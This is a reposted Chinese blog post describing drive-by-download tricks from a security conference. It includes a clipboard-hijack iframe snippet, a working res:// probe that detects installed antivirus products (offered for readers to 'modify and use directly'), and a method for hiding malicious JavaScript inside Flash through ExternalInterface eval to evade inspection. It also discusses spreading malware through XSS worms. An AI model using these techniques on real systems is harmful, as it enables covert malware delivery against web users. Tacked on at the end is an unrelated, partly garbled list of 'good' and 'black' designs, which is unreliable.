xKungfoo上的网马猥亵技巧

今天xKungfoo 最后一天,G在上面做了个挂马产业链的议题。有些挂马猥亵技巧没有说详细,这里公开吧。其实有些没什么,就是技巧,有些人也玩过。

第一个、剪贴板劫持挂马

其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

<iframe src=http://www.baidu.com/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
var rng = document.body.createControlRange();
rng.add(iframe);
rng.execCommand('Copy');
</script>

只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

第二个、img远程域检测本地域软件安装情况

网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

<script>

//Name: img标签远程域检测本地域软件是否存在poc
//Description: IE浏览器都有效
//Author: Knownsec Team
//Date: 2008-11-03

knownImg = {}
knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)
{id: 'Avira', res: 'res://C://Program%20Files//Avira//AntiVir%20PersonalEdition%20Classic//setup.dll/#2/#132'},
{id: 'baidu', res: 'res://C://Program%20Files//baidu//Baidu%20Hi//BaiduHi.exe/#2/#152'},
{id: 'Super Rabbit', res: 'res://C://Program%20Files//Super%20Rabbit//MagicSet//timedate.exe/#2/BBNO'},
{id: '365Menshen', res: 'res://C://Program%20Files//365Menshen//menshen.exe/#2/#227'},
{id: 'quicktime', res: 'res://c://program%20files//quicktime//quicktimeplayer.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组
knownImg.tmp_resList = new Array();

knownImg.checkSoft = function(){ //检测函数
if (document.all){
   x = new Array();
   for (i = 0; i < knownImg.resList.length; i++){
    x[i] = new Image();
    x[i].src = "";
    knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中
    x[i].onload = function(){
     //alert(knownImg.resList[i].id + ': return true');
    }
    x[i].onerror = function(){
     //alert(knownImg.resList[i].id + ': return false');
     knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值
    }
    x[i].src = knownImg.resList[i].res;
   }
}
}
knownImg.checkSoft();

alert(knownImg.ok_resList); //弹出
document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));
</script>

IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

第三个、利用Flash封装网马

这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马JS代码。那就没什么办法保护我们的网马JS代码了?有……

我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr.open ('POST', 'create_cmd.php', false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send(cmd);}post_it();");

上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。

G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用:)。

第四个、Web2.0蠕虫式挂马

这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了),不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台 将会提供打包一些蠕虫功能。

Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……

恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧。

 

 

转自:http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html

好的设计: 1. Apple的产品设计 2. Swiss International Air Lines的标志设计 3. Coca-Cola瓶子设计 4. Audi的汽车外观设计 5. Nike的“Just Do It”广告设计 6. IKEA的家具设计 7. Chanel的时装设计 8. Google的搜索引擎设计 9. Twitter的标志设计 10. Airbnb的用户界面设计 11. Leica的相机设计 12. BMW的汽车内部设计 13. Louis Vuitton的Logo设计 14. Muji的无印良品设计 15. Tiffany的钻石首饰设计 16. Rolex的手表设计 17. Ferrari和Lamborghini的超级跑车设计 18. Airbnb的品牌设计 19. Dyson的吸尘器设计 20. SpaceX的火箭设计 21. Patagonia的户外装备设计 22. Walt Disney的乐园设计 23. Hermès的时装设计 24. Harley-Davidson的摩托车设计 25. Sony的电子产品设计 26. Canon的相机设计 27. 亚逊的电商设计 28. Dropbox的云存储设计 29. Tesla的汽车设计 30. Pixar的动画片设计 31. HP的打印机设计 32. 麦当劳的快餐包装设计 33. GoPro的运动相机设计 34. 芬利的厨房刀具设计 35. Adidas的球鞋设计 36. 索尼 PlayStation的游戏设计 37. Redbull的品牌设计 38. 麦克斯韦的电池设计 39. Amazon Kindle的电子阅读器设计 40. Bose的音响设计 41. Nest的智能家居设备设计 42. 谷歌旗下的自动驾驶汽车设计 43. 微信App的用户界面设计 44. 微软的Windows操作系统设计 45. Bic的原子笔设计 46. Vitra的家具设计 47. 梦工厂的电影设计 48. 拜耳公司的化学物质设计 49. Gucci的时装设计 50. 芭比娃娃的人物设计 黑的设计: 1. 空气污染物排放设备设计 2. 络欺诈工具设计 3. 黑客软件设计 4. 爆炸物设计 5. 垃圾食品设计 6. 反人类罪行的武器设计 7. 制药工业的热销的毒品设计 8. 肆虐电子舞曲的耳机设计 9. 枪支和子弹的设计 10. 造成毁灭性灾难的核武器设计 11. 坑蒙拐骗的软件设计 12. 大规模杀伤性武器的设计 13. 窃取个人隐私的软件设计 14. 严重污染的工业设备设计 15. 非法集资软件设计 16. 长时间使用容易产生癌症的化妆品设计 17. 可能引起火灾事故的电器设计 18. 非法捕捞海产品的捕捞器设计 19. 严重污染的交通工具设计 20. 厂房使用超标燃料的发动机设计 21. 盗取身体健康数据的软件设计 22. 制造调皮的儿童玩具设计 23. 可能损人害己的药品设计 24. 欺诈性贷款软件设计 25. 互联诈骗平台的程序设计 26. 猥亵行为的软件设计 27. 酗酒成瘾的饮品设计 28. 利用味精制造不健康的食品设计 29. 绕过编码的非法软件设计 30. 逃税设计软件 31. 人肉搜索程序设计 32. 反对性别平等的市场软件设计 33. 可能对环境造成严重污染的建筑设备设计 34. 不安全的电动汽车设计 35. 可能威胁络安全的计算机程序设计 36. 对场馆使用声音污染的音响设备设计 37. 非法销售药品的电商平台设计 38. 造成巨额经济损失的金融软件设计 39. 制作烟草产品设计 40. 制造劳动力田地的人力资源软件设计 41. 可能引发切割事故的锋利线条设计 42. 对环境产生巨大污染的过时技术设计 43. 售卖假货的购物平台设计 44. 制作有毒化学品设计 45. 造成深远影响的高污染发动机设计 46. 拐卖人口设计 47. 设计常常让人受伤的体育器材 48. 伤害性驾驶模式的汽车设计 49. 制造非法枪械的设计 50. 造成严重心理伤害的虚拟现实游戏设计
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值